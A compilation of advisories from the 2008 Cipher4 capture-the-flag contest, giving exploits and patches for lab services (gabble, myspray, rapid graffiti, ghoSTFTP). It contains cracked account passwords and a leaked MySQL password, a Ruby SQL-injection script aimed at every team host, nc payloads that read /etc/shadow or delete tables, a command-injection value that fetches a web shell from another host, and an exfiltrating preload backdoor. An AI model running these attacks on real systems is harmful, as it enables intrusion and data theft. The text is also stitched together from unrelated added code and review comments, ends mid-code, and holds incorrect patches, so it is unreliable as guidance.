Advisories Cipher4

From Labor für Echtzeitsysteme

********************* Advisory 1, Flux Fingers on (General Fault)
 
Scored: 1
Submitted: 18:19:45 1.8.2008
Published: 18:49:45 1.8.2008
 
Judge Lexi said: hm
 
Advisory
Several users in /etc/shadow have weak passwords. Cracking time using John the Ripper was about 5 seconds.
 
Password (Username)
123456 (brook3)
foobar (5kr3wdr1v3r)
sex (gabble)
 
 
Exploit
Login using the User with ssh.
 
Patch
Edit /etc/ssh/sshd_config, add a line "AllowUsers root" and restart the sshd:

/etc/init.d/ssh restart
 
********************* Advisory 3, Defender of the Flag on ghoSTFTP
 
Scored: 1
Submitted: 18:28:24 1.8.2008
Published: 18:58:24 1.8.2008
 
Judge Lexi said: ok
 
Advisory
Attackers can remotely mount NFS /home/ghoSTFTP and /tmp. This enables reading all files in /home/ghoSTFTP. Moreover, one can read/write all files in /tmp.
 
Exploit
Execute the following command:
 
mount somehost:/home/ghoSTFTP /mnt/
 
Patch
Edit /etc/exports and remove the following lines:
 
/home/ghoSTFTP 10.0.0.0/255.0.0.0(ro,no_root_squash)
/tmp 10.0.0.0/255.0.0.0(rw,root_squash)
 
 
********************* Advisory 4, teamSparta on (General Fault)
 
Scored: 1
Submitted: 18:37:53 1.8.2008
Published: 19:07:53 1.8.2008
 
Judge tilo said: k
 
Advisory
mysqld by default listens on all interfaces; it should be bound to localhost so you cannot just get the others' flags, because passwords are globally shared. :)
 
Exploit
mysql -h 10.1.x.3 -u [...]
 
Patch
bind-address = 127.0.0.1 in /etc/mysql/my.cnf
 
********************* Advisory 5, Defender of the Flag on myspray
 
Scored: 1
Submitted: 18:37:59 1.8.2008
Published: 19:07:59 1.8.2008
 
Judge tilo said: ok
 
Advisory
MySpray is a Studi-VZ-like page to share your personal data to your buddies.
People can register and set up personal profiles.
 
 
The admin interface is accessible via the URL /myspray/admin.html from the front page or by just typing the link into the address bar, without authentication.
 
Exploit
Enter the admin area and delete the database via web interface or login as any user.
 
Patch
As an initial response, rename /myspray/templates/admin.html to a secret filename that is hard to guess. (Alternatively you can change the Linux rights for this file: chmod 000 templates/admin.html). Later you can delete the URL entry from the file urls.py in the root directory of the application and update the urls.pyc file.
 
********************* Advisory 6, Defender of the Flag on myspray
 
Scored: 1
Submitted: 18:38:41 1.8.2008
Published: 19:08:41 1.8.2008
 
Judge tilo said: .
 
Advisory
Advisory myspray:
1. Background
On the server there is a MySQL database running, which has a default
insecure configuration and additionally an insecure user.
2. Description
The problem is that MySQL is listening on any IP address (*).
In the MySQL database there exists a
user named "myspray" with a default password.
 
 
Exploit
You can connect to the MySQL database from any IP address via
mysql -h 10.1.30.3 -u myspray -p
 
Patch
1. You could configure MySQL so that it only listens to local requests,
OR
2. You could delete the user myspray,
OR
3. You could edit the user so that he can only connect locally.
 
********************* Advisory 11, The Electronic Mayhem on rapid graffiti
 
Scored: 1
Submitted: 18:50:02 1.8.2008
Published: 19:20:02 1.8.2008
 
Judge tilo said: ok
 
Advisory
It's possible to log in as admin without a password. This allows erasing information from the system and viewing all the hosted images.
 
Exploit
Surf to http://host/rapid/radmin. When prompted for a login, use the login "admin" and leave the password field empty.
 
Patch
Run the following command:
 
htpasswd -c /home/rapid/radmin/.admin admin
 
********************* Advisory 17, Squareroots on (General Fault)
 
Scored: 1
Submitted: 18:53:32 1.8.2008
Published: 19:23:32 1.8.2008
 
Judge Lexi said: ok
 
Advisory
======================================================================
squareroots @ cipher4
 
- missing restrictions in /home -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
All; Configuration Fault
 
======================================================================
2) Severity
 
Rating: Critical
 
======================================================================
3) Description of Vulnerability
 
User /home directory permissions are too relaxed; this can be used
to compromise other users' directories.
 
======================================================================
4) Exploit / PoC
 
drwxr-xr-x 10 ghoSTFTP ghoSTFTP 4.0K Jul 11 06:56 .
drwxr-xr-x 21 root root 32K Jul 28 10:28 ..
drwxr-xr-x 4 5kr3wdr1v3r 5kr3wdr1v3r 4.0K Jul 20 03:41 5kr3wdr1v3r
drwxr-xr-x 2 brook3 brook3 4.0K Jul 19 05:44 brook3
drwxr-xr-x 3 gabble gabble 4.0K Aug 1 06:49 gabble
drwxr-xr-x 2 ghoSTFTP ghoSTFTP 4.0K Jul 28 10:39 ghoSTFTP
drwxrwxr-x 5 myspray www-data 4.0K Jul 28 08:53 myspray
drwxr-xr-x 3 r00t r00t 4.0K Jul 18 09:07 r00t
drwxrwxr-x 9 rapid www-data 4.0K Aug 1 06:48 rapid
drwxr-xr-x 2 tagging tagging 12K Aug 1 06:48 tagging
 
======================================================================
5) Solution
 
Limit user permissions to needed directories only.
i.e.: chmod o-rx <directory>
 
======================================================================
6) Time Table (time is GMT +2)
 
18:05 - discovery
18:13 - fixed
18:50 - disclosure
 
======================================================================
 
 
Exploit
 
 
Patch
chmod o-rx <directory>
 
********************* Advisory 18, SYPER on (General Fault)
 
Scored: 1
Submitted: 18:54:32 1.8.2008
Published: 19:24:32 1.8.2008
 
Judge Lexi said: ok
 
Advisory
MySQL root with no password set.
 
Exploit
Just use the mysql client.
 
Patch
Set a password for root@localhost, e.g. with mysqladmin.
 
********************* Advisory 19, The Electronic Mayhem on (General Fault)
 
Scored: 1
Submitted: 18:55:03 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said:
 
Advisory
The HTTP server runs on port 80 and gives a directory listing. This allows attackers to read arbitrary files.
 
Exploit
In a web browser, connect to the vulnerable host on port 80.
 
http://vulnerable
 
Navigate to media/members to retrieve files within that directory.
 
 
 
Patch
- In the Apache config files, added Options -Indexes everywhere
- In /etc/apache2/sites-enabled/myspray, for VirtualHost *:80, changed the DocumentRoot to /var/www
 
********************* Advisory 22, The Electronic Mayhem on (General Fault)
 
Scored: 1
Submitted: 18:57:08 1.8.2008
Published: 19:27:08 1.8.2008
 
Judge Lexi said: ok
 
Advisory
It's possible to login remotely to mysql with the default debian password. This gives full control over the database.
 
Exploit
Log in via mysql to the remote host with the following username/password.
 
user= debian-sys-maint
password = n0eivtjU1w9ieUEw
 
Patch
Change the password. Execute the following command:
 
mysqladmin -u root password NEWPASSWORD
 
Change the debian system maintainer password in the same way.
 
 
 
 
 
 
********************* Advisory 25, The Electronic Mayhem on rapid graffiti
 
Scored: 1
Submitted: 19:03:01 1.8.2008
Published: 19:33:01 1.8.2008
 
Judge tilo said: ok
 
Advisory
Surfing to http://host/rapid/files/ allows attackers to see all files.
 
Exploit
Surf to http://host/rapid/files/ and download all files.
 
Patch
Edit /home/rapid/files/.htaccess
 
Replace the second line with
 
Options -Indexes
 
 
 
********************* Advisory 26, Squareroots on (General Fault)
 
Scored: 1
Submitted: 19:03:19 1.8.2008
Published: 19:33:19 1.8.2008
 
Judge tilo said: okay
 
Advisory
======================================================================
squareroots @ cipher4
 
- missing restrictions in /home -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
All; Configuration Fault
 
======================================================================
2) Severity
 
Rating: Critical
 
======================================================================
3) Description of Vulnerability
 
User /home directory permissions are too relaxed; this can be used
to compromise other users' directories.
 
======================================================================
4) Exploit / PoC
 
drwxr-xr-x 10 ghoSTFTP ghoSTFTP 4.0K Jul 11 06:56 .
drwxr-xr-x 21 root root 32K Jul 28 10:28 ..
drwxr-xr-x 4 5kr3wdr1v3r 5kr3wdr1v3r 4.0K Jul 20 03:41 5kr3wdr1v3r
drwxr-xr-x 2 brook3 brook3 4.0K Jul 19 05:44 brook3
drwxr-xr-x 3 gabble gabble 4.0K Aug 1 06:49 gabble
drwxr-xr-x 2 ghoSTFTP ghoSTFTP 4.0K Jul 28 10:39 ghoSTFTP
drwxrwxr-x 5 myspray www-data 4.0K Jul 28 08:53 myspray
drwxr-xr-x 3 r00t r00t 4.0K Jul 18 09:07 r00t
drwxrwxr-x 9 rapid www-data 4.0K Aug 1 06:48 rapid
drwxr-xr-x 2 tagging tagging 12K Aug 1 06:48 tagging
 
ls /home/thisisnotmyhome
cat /home/thisisnotmyhome/thisisnotmydata
 
======================================================================
5) Solution
 
Limit user permissions to needed directories only.
i.e.: chmod o-rx <directory>
 
======================================================================
6) Time Table (time is GMT +2)
 
18:05 - discovery
18:13 - fixed
18:50 - disclosure
 
======================================================================
 
 
Exploit
ls /home/thisisnotmyhome/
cat /home/thisisnotmyhome/thisisnotmydata
 
 
Patch
chmod o-rx <directory>
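An added example for the two "missing restrictions in /home" advisories (17 and 26), not the team's own code: it parses the listing quoted above, flags every home directory that other users may read or enter, and computes the mode that "chmod o-rx" would leave; the live audit function assumes a Linux /home layout and only reports.

```python
"""Audit of /home directory permissions: parse an ls -l listing (or stat a
live directory), flag entries readable or searchable by "others", and show
the mode "chmod o-rx" would produce."""
import os
import stat

# The directory listing quoted from the advisory; "." and ".." are the
# directory itself and its parent and are skipped by the audit.
ADVISORY_LISTING = """\
drwxr-xr-x 10 ghoSTFTP ghoSTFTP 4.0K Jul 11 06:56 .
drwxr-xr-x 21 root root 32K Jul 28 10:28 ..
drwxr-xr-x 4 5kr3wdr1v3r 5kr3wdr1v3r 4.0K Jul 20 03:41 5kr3wdr1v3r
drwxr-xr-x 2 brook3 brook3 4.0K Jul 19 05:44 brook3
drwxr-xr-x 3 gabble gabble 4.0K Aug 1 06:49 gabble
drwxr-xr-x 2 ghoSTFTP ghoSTFTP 4.0K Jul 28 10:39 ghoSTFTP
drwxrwxr-x 5 myspray www-data 4.0K Jul 28 08:53 myspray
drwxr-xr-x 3 r00t r00t 4.0K Jul 18 09:07 r00t
drwxrwxr-x 9 rapid www-data 4.0K Aug 1 06:48 rapid
drwxr-xr-x 2 tagging tagging 12K Aug 1 06:48 tagging
"""

OTHER_RX = stat.S_IROTH | stat.S_IXOTH   # the bits that "chmod o-rx" clears


def parse_mode(mode_str):
    """Turn an ls(1) mode string such as 'drwxrwxr-x' into permission bits.
    's'/'t' count as executable, 'S'/'T' (set bit without execute) do not;
    the setuid/setgid/sticky bits themselves are not reconstructed."""
    if len(mode_str) != 10:
        raise ValueError("expected a 10-character mode string, got %r" % mode_str)
    bits = 0
    for ch in mode_str[1:]:
        bits = (bits << 1) | (0 if ch in '-ST' else 1)
    return bits


def hardened_mode(mode_bits):
    """Equivalent of 'chmod o-rx': drop read and search for others, keep the rest."""
    return mode_bits & ~OTHER_RX


def audit_listing(listing):
    """Return (name, owner, current mode, hardened mode) for every directory in
    an 'ls -l' listing that other users may read or enter."""
    findings = []
    for line in listing.splitlines():
        fields = line.split()
        if len(fields) < 9 or not fields[0].startswith('d'):
            continue                      # blank line or not a directory entry
        name = fields[-1]
        if name in ('.', '..'):
            continue
        mode = parse_mode(fields[0])
        if mode & OTHER_RX:
            findings.append((name, fields[2], oct(mode), oct(hardened_mode(mode))))
    return findings


def audit_directory(path='/home'):
    """The same check against a live system via lstat(2). Report only; the
    fix itself (chmod o-rx <directory>) is left to the administrator."""
    findings = []
    for entry in os.scandir(path):
        if not entry.is_dir(follow_symlinks=False):
            continue
        mode = stat.S_IMODE(entry.stat(follow_symlinks=False).st_mode)
        if mode & OTHER_RX:
            findings.append((entry.name, oct(mode), oct(hardened_mode(mode))))
    return findings


if __name__ == '__main__':
    for finding in audit_listing(ADVISORY_LISTING):
        print("%-12s owner %-12s mode %s -> %s" % finding)
```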
 
********************* Advisory 27, in23canation on myspray
 
Scored: 1
Submitted: 19:04:03 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said:
 
Advisory
Directory Listing is enabled in myspray.
 
 
Exploit
navigate to http://10.1.xx.3/
 
Patch
Create a file index.html in /home/myspray
 
********************* Advisory 29, Wizards of DoS on gabble
 
Scored: 3
Submitted: 19:09:36 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: Somebody told me the exploit is not working. Well, too late now. You keep the points.
 
Advisory
gabbled is vulnerable to SQL injection in various places,

e.g. in authUser() the ...user='%s'... in the format string
 
Exploit
#!/usr/bin/env ruby

require 'socket'
require 'net/http'
require 'net/https'
require 'net/ftp'


def exploit(ip)
  begin
    shellcode="\x02\0x00zeri';SELECT * FROM offlinemessages;--\0x001337\0x00"
    s=TCPSocket.new(ip,4000)
    s.send shellcode
    while true do
      puts s.gets
    end
  rescue StandardError => crash

  end
end
# iterate through
for i in (1..32) do
  Thread.new do
    exploit("10.0.#{i}.3")
  end
end

sleep 100
 
 
Patch
Implement an SQL statement filter :)
 
********************* Advisory 31, Squareroots on rapid graffiti
 
Scored: 2
Submitted: 19:11:59 1.8.2008
Published: 19:41:59 1.8.2008
 
Judge tilo said: .
 
Advisory
======================================================================
squareroots @ cipher4
 
- rapid graffiti configuration -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
rapid graffiti on http://host/rapid/
 
======================================================================
2) Severity
 
Rating: Critical
 
======================================================================
3) Description of Vulnerability
 
/home/rapid/premium/.htaccess contains a <Files *.*> directive.
This only limits access to files containing a dot;
the file "users" is still accessible.
 
======================================================================
4) Exploit / PoC
 
Access http://host/rapid/premium/users
 
======================================================================
5) Solution
 
In .htaccess:
Change <Files *.*> to <Files *>
 
======================================================================
6) Time Table (time is GMT +2)
 
18:45 - discovery
18:50 - fixed
19:05 - disclosure
 
======================================================================
 
 
Exploit
Access http://host/rapid/premium/users
 
Patch
In .htaccess:
Change <Files *.*> to <Files *>
 
********************* Advisory 36, Chocolate Makers on gabble
 
Scored: 3
Submitted: 19:20:42 1.8.2008
Published: 19:50:42 1.8.2008
 
Judge tilo said: yes
 
Advisory
SQL injection in several functions in database.c
 
Exploit
(echo -en "\x02ciao\x00ciao ' delete from gabble ; cat) | nc TARGET 4000
 
Patch
At the beginning of database.c:

#define sprintf(x, ...) \
{ \
    int i; \
    snprintf(x, sizeof(x) - 1, __VA_ARGS__); \
    for (i = 0; i < sizeof(x); i++) { \
        if (x[i] == '\'') \
            x[i] = '-'; \
    } \
}
 
 
********************* Advisory 38, Defender of the Flag on rapid graffiti
 
Scored: 3
Submitted: 19:21:30 1.8.2008
Published: 19:51:30 1.8.2008
 
Judge tilo said: correct
 
Advisory
rapid graffiti is a website with an upload function for picture files.
On this website you can register a new user with
"rapid/ssl/sign.php". The problem is that in this file two variables, "un" and "pw", exist which are handed over to

exec("htpasswd -mb ../premium/users ".$_REQUEST['un']." ".$_REQUEST['pw']);

in line 45.
 
Exploit
On ../rapid/ssl.sign.php, in the GET variable "un", you can hand over shell commands like:
 
UN: "DotF ; wget 10.1.30.5/shell.php"
 
You can then open the shell.php via 10.1.x.3/rapid/shell.php
 
Patch
Filter shell commands out of the GET variables un and pw via:
$_REQUEST['un'] = escapeshellcmd($_REQUEST['un']);
$_REQUEST['pw'] = escapeshellcmd($_REQUEST['pw']);
 
before line 45
 
********************* Advisory 39, h4ck!nb3rg on gabble
 
Scored: 2
Submitted: 19:25:37 1.8.2008
Published: 19:55:37 1.8.2008
 
Judge tilo said: no exploit
 
Advisory
Format string vulnerability in gabbled.c on line 282.

if (sendPacket(client_fd,"%c%s\xFF",52,"user authenticated")) {
    printf(user); printf(" authenticated\n");
    return 1;
}

If user-supplied input in the variable 'user' contains format strings like %x, %s, ... it would be possible to examine stack memory and read/write arbitrary memory addresses.
 
Exploit
 
 
Patch
By using sprintf _correctly_ with more than one parameter this vulnerability can be fixed.

if (sendPacket(client_fd,"%c%s\xFF",52,"user authenticated")) {
    sprintf("%s",user); printf(" authenticated\n");
    return 1;
}
 
********************* Advisory 40, Chocolate Makers on ghoSTFTP
 
Scored: 3
Submitted: 19:25:43 1.8.2008
Published: 19:55:43 1.8.2008
 
Judge tilo said: finally
 
Advisory
The service ghoSTFTP serves as a simple file transfer protocol over UDP.
The service runs with root privileges and, as long as it doesn't do
any authentication, it's possible to read and write any file in the
file system.
 
Exploit
(perl -e 'print "\x01/etc/shadow\x00"' ; cat) | nc -u vuln 1025
 
Patch
Change the start script to drop the privileges to user 1005 (ghoSTFTPd):
 
diff -u ghoSTFTPd.orig ghoSTFTPd
--- ghoSTFTPd.orig 2008-07-29 23:17:46.000000000 -1000
+++ ghoSTFTPd 2008-08-01 07:23:44.000000000 -1000
@@ -48,9 +48,9 @@
# 0 if daemon has been started
# 1 if daemon was already running
# 2 if daemon could not be started
- start-stop-daemon --start -c 0:0 -d $BASEDIR --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \\
+ start-stop-daemon --start -c 1005:1005 -d $BASEDIR --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \\
|| return 1
- start-stop-daemon --start -c 0:0 -d $BASEDIR --quiet --pidfile $PIDFILE --exec $DAEMON -- \\
+ start-stop-daemon --start -c 1005:1005 -d $BASEDIR --quiet --pidfile $PIDFILE --exec $DAEMON -- \\
$DAEMON_ARGS \\
|| return 2
}
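Review bot: the `-c 1005:1005` change is applied to both start-stop-daemon invocations (the `--test` probe and the real start), which is right, since a probe still running as 0:0 would succeed where the real start then fails; but the uid:gid pair is now hard-coded twice. Suggest one variable (e.g. `DAEMON_USER=ghoSTFTPd`, the account name the advisory gives for uid 1005) used in both `-c` options so the two lines cannot drift, and a check that $BASEDIR and the directory holding $PIDFILE are accessible to that uid, otherwise the daemon fails to start after the privilege drop.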
 
 
********************* Advisory 41, teamSparta on (General Fault)
 
Scored: 4
Submitted: 19:30:26 1.8.2008
Published: 20:00:26 1.8.2008
 
Judge tilo said: very nice
 
Advisory
ld.so.preload contains /lib/libradio.so which overwrites read(..) to scan for 11.xx.xx.xx and sends a UDP packet to 10.x.x.x:31337 containing the whole read buffer.
 
This is the ub0r backd00r, so kindly respect our advisory policy by delaying this for a little longer... ;)
 
Exploit
Inject the string 11.1.x.x in various interesting places and have flags sent to you via UDP.
 
Patch
Clear /etc/ld.so.preload.
 
********************* Advisory 42, h4ck!nb3rg on myspray
 
Scored: 2
Submitted: 19:31:52 1.8.2008
Published: 20:01:52 1.8.2008
 
Judge tilo said: all right, but you won't get any flags with this "exploit"
 
Advisory
The myspray application is a portal similar to studivz. The myspray application login is prone to XSS attacks due to a lack of user input validation. That can be used to steal user credentials if a user clicks on a specially crafted link.
 
Exploit
type the following into the login field:
"<script>alert(1)</script>
 
Patch
Use the Python htmlspecialchars to sanitize the input before sending it back to the browser.
 
********************* Advisory 44, Squareroots on myspray
 
Scored: 4
Submitted: 19:36:08 1.8.2008
Published: 20:06:08 1.8.2008
 
Judge tilo said: nice
 
Advisory
======================================================================
squareroots @ cipher4
 
- MySpray SQL Injection -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
MySpray as a HTTP Service on URL http://host/myspray/
 
======================================================================
2) Severity
 
Rating: Highly critical
Impact: Webapp access
Where : remote
 
======================================================================
3) Description of Vulnerability
 
SQL injection to log in without a valid password.
It's possible via the username parameter using a query like
'; SELECT * FROM community_member //

The responsible code is the function "login", where no input validation is done:
query = "SELECT * FROM community_member WHERE email = '%s' AND password = '%s';" % \
    (post['email'], md5.new(post['password']).hexdigest())
 
======================================================================
4) Exploit / PoC
 
Login using the query '; SELECT * FROM community_member //
 
======================================================================
5) Solution
 
Do some input validation like:
 
query = "SELECT * FROM community_member WHERE email = '%s' AND password = '%s';" % \
    (MySQLdb.escape_string(post['email']), md5.new(post['password']).hexdigest())
 
======================================================================
6) Time Table (time is GMT +2)
 
19:00 - discovery
19:15 - fixed
19:40 - disclosure
 
======================================================================
 
Exploit
Login using the query '; SELECT * FROM community_member //
 
Patch
 
Do some input validation like:
 
query = "SELECT * FROM community_member WHERE email = '%s' AND password = '%s';" % \
    (MySQLdb.escape_string(post['email']), md5.new(post['password']).hexdigest())
 
 
********************* Advisory 46, h4ck!nb3rg on gabble
 
Scored: 2
Submitted: 19:38:32 1.8.2008
Published: 20:08:32 1.8.2008
 
Judge tilo said: missing exploit
 
Advisory
On line 324 of gabbled.c the function printf could be used for a format string vulnerability.

if (sendPacket(client_fd,"%c%s\xFF",53,"user removed")) {
    printf(user); printf(" removed\n");
    return 1;
}

Through input %s, %x, ... the user could read/write arbitrary memory addresses.
 
Exploit
 
 
Patch
By using the function sprintf _correctly_ with two parameters you could fix this bug.

if (sendPacket(client_fd,"%c%s\xFF",53,"user removed")) {
    sprintf("%s",user); printf(" removed\n");
    return 1;
}
 
********************* Advisory 47, HackerDom on rapid graffiti
 
Scored: 3
Submitted: 19:38:48 1.8.2008
Published: 20:08:48 1.8.2008
 
Judge tilo said: yes
 
Advisory
In file upload.php the variable $id is not sanitized properly.
$id=$_REQUEST['i'];

Due to this it is possible to create a dir & upload a file in any directory you have rights to write to. For example: /tmp
 
Exploit
Change the field ID to something you want.
 
Patch
$id=intval($_REQUEST['i']);
 
********************* Advisory 54, h4ck!nb3rg on myspray
 
Scored: 3
Submitted: 19:55:26 1.8.2008
Published: 20:25:26 1.8.2008
 
Judge tilo said: yes
 
Advisory
The myspray app is similar to studivz. The application is prone to XSS attacks when leaving a message to users. If the message is read by an admin, it is possible to steal his cookie and then take over control of the app.
 
Exploit
To exploit, post the following message to a user:
<script>alert(document.cookie)</script>
Instead of alerting the cookie it can be sent to an attacker using an image tag or similar.
 
 
Patch
Patch the templates/profile.html file to use the Python function htmlspecialchars(). That's all ;-)
 
********************* Advisory 55, HackerDom on rapid graffiti
 
Scored: 2
Submitted: 20:00:09 1.8.2008
Published: 20:30:09 1.8.2008
 
Judge tilo said: yes, nice patch, but boring exploit ;-)
 
Advisory
This web server executes PHP files.
upload.php allows uploading a file with any extension. So it's possible to upload a PHP file and then execute it.
 
 
Exploit
upload file 1.php.
cat 1.php
<?php phpinfo() ?>
 
Patch
Do not upload .php files.
 
$filepath="files/".$id."/";
$filename=$_FILES['f']['name'];
$filesize=$_FILES['f']['size'];

if (preg_match('/\.php$/i', $filename)){
    echo "PHP is not allowed for uploading<br>";
    exit;
}
 
$filetmp =$_FILES['f']['tmp_name'];
 
 
 
********************* Advisory 56, The Electronic Mayhem on rapid graffiti
 
Scored: 2
Submitted: 20:03:05 1.8.2008
Published: 20:33:05 1.8.2008
 
Judge tilo said: ok
 
Advisory
Shell injection possible via rapid graffiti. Allows execution of arbitrary shell commands.
 
Exploit
In line 42 of sign.php, a shell command is executed which contains user input. However, this input is not properly sanitized.
 
exec("htpasswd -mb ../premium/users ".$_REQUEST['un']." ".$_REQUEST['pw']);
 
Sending a malicious request where the request variable pw equals "; command" allows execution of "command".
 
 
Patch
Edit line 42 in sign.php:
 
exec(escapeshellcmd("htpasswd -mb ../premium/users ".$_REQUEST['un']." ".$_REQUEST['pw']));
 
 
********************* Advisory 57, The RPIsec knurd machine on rapid graffiti
 
Scored: 2
Submitted: 20:05:47 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: ok
 
Advisory
You can use upload.php to upload php scripts.
 
Exploit
Go to upload.php, upload a file named test.php containing the following code:
<?
phpinfo();
?>
 
When the file is uploaded, click the link to view it and you'll see that the code was executed.
 
Patch
Make sure the uploaded file has the extension of an image such as .jpeg, .jpg or .gif.
 
$len = strlen($filename);
if (strrpos($filename, ".jpeg") != $len-5 && strrpos($filename, ".jpg") != $len-4 && strrpos($filename, ".gif") != $len-4) die("Bad file");
 
********************* Advisory 60, ENOFLAG on gabble
 
Scored: 3
Submitted: 20:08:43 1.8.2008
Published: 20:38:43 1.8.2008
 
Judge tilo said: correct patch, but the exploit....
 
Advisory
Format string vulnerability in dbSetPassword (gabble):

int dbSetPassword(char* user, char* password) {
    char query[QUERYLEN];
    char usr[] = "_________UNKNOWN_________";

    if (user && password)
        sprintf(usr,user);
 
 
Exploit
set password %x %x
 
Patch
if (user && password)
    sprintf(usr,"%s", user);
 
********************* Advisory 62, The RPIsec knurd machine on ghoSTFTP
 
Scored: 3
Submitted: 20:10:19 1.8.2008
Published: 20:40:19 1.8.2008
 
Judge tilo said: Nice. Well, no real exploit or something is given, but PostScript is hard enough to read.
 
Advisory
ghoSTFTPd executes PostScript files it receives. While Ghostscript correctly executes with the SAFER option, it is still possible to write a PostScript file that performs a series of commands and outputs to a file, which can be read by the attacker.
 
 
Exploit
 
 
Patch
Remove the following line from ghoSTFTPd.ps:
 
filename ps
 
********************* Advisory 64, HPAC08 on rapid graffiti
 
Scored: 3
Submitted: 20:18:51 1.8.2008
Published: 20:48:51 1.8.2008
 
Judge tilo said: yes
 
Advisory
The forgot-password function is vulnerable to SQL injection:
Neither the submitted username nor the answer to the question is escaped using mysql_real_escape_string.
To make it easier, a list of all registered users is available, too.
 
Exploit
Read a username from https://$server/rapid/ssl/login.php. Go to https://$server/rapid/ssl/forgot.php and put the following SQL code into the username box:
 
' UNION SELECT answer FROM pw WHERE usr='$username' limit 1 UNION select usr from pw where usr='
 
Then you see the answer to the question and can generate a new password to log in.
 
Patch
diff -u forgot_vul.php forgot.php
--- forgot_vul.php 2008-08-01 08:23:43.000000000 -1000
+++ forgot.php 2008-08-01 08:12:23.000000000 -1000
@@ -38,7 +38,7 @@
<?php
if (isset($_REQUEST['n'])) {
$user=$_REQUEST['n'];
- $result=mysql_query("SELECT question FROM pw WHERE usr='".$user."'");
+ $result=mysql_query("SELECT question FROM pw WHERE usr='".mysql_real_escape_string($user)."'");
if ($row=mysql_fetch_object($result)) {
echo "<br><form name='answer' method='post' action='forgot.php'>";
echo "<table><tbody>";
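Review bot: the escaping is applied only inside the query on the `+` line, while `$user=$_REQUEST['n'];` two lines above still holds the raw value, so any other use of `$user` later in this branch (the form it echoes, for instance) stays unprotected; escaping at assignment, `$user=mysql_real_escape_string($_REQUEST['n']);`, covers every use with one change. Also verify that the database connection is open before line 38, since mysql_real_escape_string needs an active link to escape correctly.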
@@ -58,7 +58,7 @@
elseif (isset($_REQUEST['u']) && isset($_REQUEST['a'])) {
$user=$_REQUEST['u'];
$answer=$_REQUEST['a'];
- $result=mysql_query("SELECT answer FROM pw WHERE usr='".$user."'");
+ $result=mysql_query("SELECT answer FROM pw WHERE usr='".mysql_real_escape_string($user)."'");
if ($row=mysql_fetch_object($result)) {
if ($row->answer==$answer) {
$newpassword=rand(100000,999999);
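Review bot: same remark as for the first hunk: escape `$user` at the assignment `$user=$_REQUEST['u'];` rather than inside the single query. The fix itself is complete for this query since `$answer` never reaches the database, but the visible check `$row->answer==$answer` uses PHP's loose `==`, under which two numeric strings compare numerically ("10" equals "1e1"); use `===` for the answer comparison. Separately, `rand(100000,999999)` draws the new password from a six-digit space with a non-cryptographic generator, which is outside this hunk's purpose but worth a follow-up.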
 
 
********************* Advisory 66, Scythian on myspray
 
Scored: 2
Submitted: 20:23:34 1.8.2008
Published: 20:53:34 1.8.2008
 
Judge tilo said: .
 
Advisory
The Django administration application will, when accessed by a user
who is not sufficiently authenticated, display a login form and ask
the user to provide the necessary credentials before displaying the
requested page. This form will be submitted to the URL the user
attempted to access, by supplying the current request path as the
value of the form's "action" attribute.
 
The value of the request path was not being escaped, creating an
opportunity for a cross-site scripting (XSS) attack by leading a user
to a URL which contained URL-encoded HTML and/or JavaScript in the
request path.
 
Exploit
During registration, write this string in the first name field:
 
<script> alert('test')</script>
 
This string shows that there is SQL injection in the code.
 
Patch
django/branches/0.96-bugfixes/django/contrib/admin/views/decorators.py
before
'app_path': request.path,
after
'app_path': escape(request.path),
 
 
********************* Advisory 67, h4ck!nb3rg on myspray
 
Scored: 2
Submitted: 20:31:10 1.8.2008
Published: 21:01:10 1.8.2008
 
Judge tilo said: .
 
Advisory
The myspray application is similar to studivz. Due to an SQL injection vulnerability it is possible to send arbitrary commands to the database interface. The vulnerable file is "editmypage.html"; the vulnerable parameter is "gender", which is pretty much obscured because it is a dropdown field ;-)
 
Exploit
Produce a simple error by entering the following code into the parameter:
bla' or 1=1; --
That results in "data truncated from column 'gender' at row 1".

That already produces a stack trace; insert other statements to read or alter data (for example with 25 parameters for community_member ;-)
 
Patch
Use the escape_string function in views.py
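An added example for the myspray SQL injection advisories (44 and 67), not the team's or the application's code: the advisory's "%"-formatted login query beside a parameterised replacement, exercised with the payload quoted in advisory 44. It assumes sqlite3 as a stand-in for MySQL and a constructed user row; with MySQLdb the placeholder is %s instead of ?, with the same values tuple passed as the second argument of cursor.execute.

```python
"""myspray login query: string formatting (injectable) vs. parameters.
sqlite3 stands in for MySQL; the community_member row is constructed."""
import hashlib
import sqlite3

# Payload quoted from the advisory
PAYLOAD = "'; SELECT * FROM community_member //"


def md5_hex(password):
    # The application stores md5 hex digests (md5.new(...).hexdigest()).
    return hashlib.md5(password.encode('utf-8')).hexdigest()


def build_query_vulnerable(email, password):
    """The advisory's construction: values are spliced into the SQL text, so
    a quote in `email` terminates the literal and the rest is parsed as SQL."""
    return ("SELECT * FROM community_member WHERE email = '%s' AND password = '%s';"
            % (email, md5_hex(password)))


def has_extra_statement(query):
    """Crude indicator of a stacked-query injection: SQL text after the first ';'.
    A legitimate e-mail address never produces one."""
    _head, _sep, tail = query.partition(';')
    return bool(tail.strip())


def setup_db():
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE community_member "
                 "(id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO community_member (email, password) VALUES (?, ?)",
                 ('alice@example.test', md5_hex('secret')))  # constructed user
    conn.commit()
    return conn


def login_safe(conn, email, password):
    """Parameterised replacement for the login query: the values travel
    separately from the SQL text, so PAYLOAD is compared as a literal e-mail
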